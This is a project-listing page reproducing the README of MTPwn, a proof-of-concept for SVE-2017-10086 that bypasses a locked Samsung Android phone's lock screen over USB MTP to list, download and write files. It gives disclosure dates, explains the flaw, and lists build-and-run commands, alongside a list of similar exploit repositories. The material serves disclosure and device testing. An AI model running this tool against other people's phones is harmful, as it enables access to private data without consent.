All Projects → smeso → Mtpwn

smeso / Mtpwn

Licence: gpl-3.0
PoC exploit for arbitrary file read/write in locked Samsung Android device via MTP (SVE-2017-10086)

Programming Languages

c
50402 projects - #5 most used programming language

Projects that are alternatives of or similar to Mtpwn

exynos-usbdl
Unsigned code loader for Exynos BootROM
Stars: ✭ 57 (-60.14%)
Mutual labels:  usb, exploit, samsung
Am I Affected By Meltdown
Meltdown Exploit / Proof-of-concept / checks whether system is affected by Variant 3: rogue data cache load (CVE-2017-5754), a.k.a MELTDOWN.
Stars: ✭ 549 (+283.92%)
Mutual labels:  exploit, poc
Poc
Proofs-of-concept
Stars: ✭ 467 (+226.57%)
Mutual labels:  exploit, poc
Exploit Discord Cache System Poc
Exploit Discord's cache system to remote upload payloads on Discord users machines
Stars: ✭ 51 (-64.34%)
Mutual labels:  exploit, poc
Nxloader
My first Android app: Launch Fusée Gelée payloads from stock Android (CVE-2018-6242)
Stars: ✭ 417 (+191.61%)
Mutual labels:  usb, exploit
Cve 2017 0785
Blueborne CVE-2017-0785 Android information leak vulnerability
Stars: ✭ 428 (+199.3%)
Mutual labels:  exploit, poc
Powerladon
Ladon Network Penetration Scanner for PowerShell, vulnerability / exploit / detection / MS17010/SmbGhost,Brute-Force SMB/IPC/WMI/NBT/SSH/FTP/MSSQL/MYSQL/ORACLE/VNC
Stars: ✭ 39 (-72.73%)
Mutual labels:  exploit, poc
Cve 2019 0708
3389远程桌面代码执行漏洞CVE-2019-0708批量检测工具(Rdpscan Bluekeep Check)
Stars: ✭ 350 (+144.76%)
Mutual labels:  exploit, poc
Poc Bank
Focus on cybersecurity | collection of PoC and Exploits
Stars: ✭ 68 (-52.45%)
Mutual labels:  exploit, poc
Ciscoexploit
Cisco Exploit (CVE-2019-1821 Cisco Prime Infrastructure Remote Code Execution/CVE-2019-1653/Cisco SNMP RCE/Dump Cisco RV320 Password)
Stars: ✭ 73 (-48.95%)
Mutual labels:  exploit, poc
Cve 2017 0781
Blueborne CVE-2017-0781 Android heap overflow vulnerability
Stars: ✭ 74 (-48.25%)
Mutual labels:  exploit, poc
Ysoserial
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
Stars: ✭ 4,808 (+3262.24%)
Mutual labels:  exploit, poc
Ladongo
Ladon Pentest Scanner framework 全平台LadonGo开源内网渗透扫描器框架,使用它可轻松一键批量探测C段、B段、A段存活主机、高危漏洞检测MS17010、SmbGhost,远程执行SSH/Winrm,密码爆破SMB/SSH/FTP/Mysql/Mssql/Oracle/Winrm/HttpBasic/Redis,端口扫描服务识别PortScan指纹识别/HttpBanner/HttpTitle/TcpBanner/Weblogic/Oxid多网卡主机,端口扫描服务识别PortScan。
Stars: ✭ 366 (+155.94%)
Mutual labels:  exploit, poc
Drupalgeddon2
Exploit for Drupal v7.x + v8.x (Drupalgeddon 2 / CVE-2018-7600 / SA-CORE-2018-002)
Stars: ✭ 464 (+224.48%)
Mutual labels:  exploit, poc
K8tools
K8工具合集(内网渗透/提权工具/远程溢出/漏洞利用/扫描工具/密码破解/免杀工具/Exploit/APT/0day/Shellcode/Payload/priviledge/BypassUAC/OverFlow/WebShell/PenTest) Web GetShell Exploit(Struts2/Zimbra/Weblogic/Tomcat/Apache/Jboss/DotNetNuke/zabbix)
Stars: ✭ 4,173 (+2818.18%)
Mutual labels:  exploit, poc
K8cscan
K8Cscan大型内网渗透自定义插件化扫描神器,包含信息收集、网络资产、漏洞扫描、密码爆破、漏洞利用,程序采用多线程批量扫描大型内网多个IP段C段主机,目前插件包含: C段旁注扫描、子域名扫描、Ftp密码爆破、Mysql密码爆破、Oracle密码爆破、MSSQL密码爆破、Windows/Linux系统密码爆破、存活主机扫描、端口扫描、Web信息探测、操作系统版本探测、Cisco思科设备扫描等,支持调用任意外部程序或脚本,支持Cobalt Strike联动
Stars: ✭ 693 (+384.62%)
Mutual labels:  exploit, poc
Hisilicon Dvr Telnet
PoC materials for article https://habr.com/en/post/486856/
Stars: ✭ 101 (-29.37%)
Mutual labels:  exploit, poc
Wordpress Xmlrpc Brute Force Exploit
Wordpress XMLRPC System Multicall Brute Force Exploit (0day) by 1N3 @ CrowdShield
Stars: ✭ 315 (+120.28%)
Mutual labels:  exploit, poc
Cve 2018 7600
💀Proof-of-Concept for CVE-2018-7600 Drupal SA-CORE-2018-002
Stars: ✭ 330 (+130.77%)
Mutual labels:  exploit, poc
Cve 2020 0796
CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhost
Stars: ✭ 1,102 (+670.63%)
Mutual labels:  exploit, poc

===== MTPwn

  • Author: Salvatore Mesoraca (https://smeso.it)
  • IDs: SVE-2017-10086
  • Severity: High
  • Affected versions: KK(4.4.x), L(5.x), M(6.x), N(7.x)
  • Date of discovery: 25/08/2017
  • Date of upstream report: 28/08/2017
  • Date of fix: 27/10/2017
  • Date of public disclosure: 02/01/2018

What's MTPwn?


MTPwn is a PoC exploit for a vulnerability of Samsung's Android phones that allows an attacker to access phone storages via USB, bypassing lock screen and/or Charge only mode. This program will list path and names of files on a device (both internal memory and external SD) and will download one random file in the current directory. It will also create a file named PWND in the root of one of the device's storages. The main goals of this program are to demonstrate the vulnerability and to allow people to test their own device for it, it doesn't aim to provide a ready to use exploit for people willing to do harm. Nevertheless MTPwn can be easily modified to download or delete any file, to create and delete folders and to do many other things.

Currently known affected devices


Any Samsung Android device that lacks SMR-OCT-2017 or SMR-NOV-2017 update. The exact update that fixes this issue depends on the device model.

How it works


One of the most common ways to connect your Android phone to your computer is by using the Media Transfer Protocol (MTP). Via MTP you can manage folders, files (and some other things) on the different storages (i.e. internal memory and SD) available on your device. When the screen of the phone is locked with password or when the USB mode is set to Charge only it shouldn't be possible to access the device via MTP (or other USB protocols). Unfortunately what really happens is that the device will prevent you from obtaining the list of the available storages, but it will let you do everything else. Many common MTP clients won't, probably, let you access a device that reports zero storages. But you can write a client that just asks for a list of all files on all storages and the device will satisfy your request. The interesting thing is that in the answer that you will get from the device you will also have storage ids for the returned files, which means that now you can use those storage ids with request that can't be issued generically against all storages i.e. file uploads. According to my experiments this vulnerability is present on a great variety of Samsung's devices from 2012 until 2017, with any android versions from 4.0.3 to 7.x.

How to test your device


First of all install libmtp:

  • Debian/Ubuntu::

    sudo apt-get install libmtp-dev

Download the latest MTPwn sources::

curl -L "https://github.com/smeso/MTPwn/archive/v0.1.tar.gz" -o mtpwn.tgz

Optionally, verify the sources against 0xD7286260BBF31719A2759FA485F0580B9DACBE6E::

curl -L \
"https://github.com/smeso/MTPwn/releases/download/v0.1/v0.1.tar.gz.asc" \
-o mtpwn.tgz.asc
gpg -v --verify mtpwn.tgz.asc

Extract and compile the sources::

tar xzvf mtpwn.tgz
cd MTPwn-0.1
make

Connect your device (with the screen locked with password) and run MTPwn::

./mtpwn

On some devices it can take a long time, just waits until it returns. Please make sure that there isn't any other application trying to use MTP. If it fails try disconnecting and reconnecting the device and run MTPwn again a couple of times. If it works it should show you a list of all files available via MTP, you should find the file got from the device in your current directory and a file named PWND in the root of one of your device's storages.

License


This code is released under GPL-3.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].